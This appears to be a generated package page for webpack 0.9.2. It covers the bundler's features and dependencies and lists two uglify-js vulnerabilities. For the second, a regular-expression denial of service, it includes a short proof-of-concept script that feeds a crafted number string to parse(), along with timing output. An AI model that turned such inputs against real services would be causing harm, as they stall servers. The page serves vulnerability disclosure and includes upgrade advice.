Webpack version 0.9.2 represents a minor update to the 0.9.1 release, offering refinements and potential bug fixes within the popular module bundler. Both versions cater to developers seeking to streamline web application development by packaging CommonJs, AMD, and labeled modules for browser deployment. The core functionality remains consistent, enabling code splitting into bundles for on-demand loading, enhancing performance and optimizing initial load times. A rich ecosystem of loaders is supported, allowing pre-processing of diverse file types like JSON, Jade, CoffeeScript, CSS, and LESS, alongside custom loaders for specialized needs.
The dependency structure is identical, leveraging utilities like async, clone, mkdirp, esprima, tapable, optimist, uglify-js, webpack-core, enhanced-resolve, and node-libs-browser. Similarly, the devDependencies for testing and development, including mocha, should, express, and various loaders such as css-loader, file-loader, and coffee-loader are consistent between the releases.
The key difference lies in the release date, with version 0.9.2 published on March 14, 2013, a day after version 0.9.1. This suggests 0.9.2 incorporates immediate fixes or minor improvements identified shortly after the initial 0.9.1 release. Developers should use the newest version for greatest stability.
For those already using 0.9.1, migrating to 0.9.2 should be seamless. New adopters benefit from a potentially more polished initial experience. Both versions provide a solid foundation for managing complex project dependencies and optimizing web application delivery, especially when combined with the flexibility offered by its loader architecture.
All the vulnerabilities related to the version 0.9.2 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.